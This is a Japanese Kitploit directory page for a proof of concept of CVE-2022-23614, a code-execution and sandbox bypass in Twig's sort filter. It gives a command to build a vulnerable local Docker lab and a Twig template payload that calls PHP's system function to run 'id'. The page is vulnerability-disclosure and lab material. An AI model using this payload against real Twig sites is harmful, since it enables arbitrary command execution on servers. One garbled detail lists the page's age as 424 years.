Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-23614 — CVE-2022-23614 (Twig sort filter コード実行/サンドボックス回避) の PoC | Kitploit
ツール/GitHubGitHub/davwwwx/cve-2022-23614
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubdavwwwx/cve-2022-23614

CVE-2022-23614

CVE-2022-23614 (Twig sort filter コード実行/サンドボックス回避) の PoC

リポジトリを見る
424年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-23614

CVE-2022-23614、GHSA-5mv2-rx3q-4w2v のPoC(Twigのsortフィルターによるコード実行/サンドボックス回避)

このコミット - https://github.com/twigphp/Twig/commit/.. で見られるように、twigはユーザーが指定した関数名をコールバックパラメータとして uasort に渡していたため (こちら)、任意のコード実行が可能となりました

脆弱性のあるtwigバージョンを含むDockerコンテナをビルドして実行するには

root@kitploit:~
$ ./build-docker.sh

localhost:1337 のWebページを開き、次のペイロードをレンダリングしてみてください

root@kitploit:~
{{ ['id','']|sort('system') }}

PoC PoC

結果 Result

ツールをダウンロード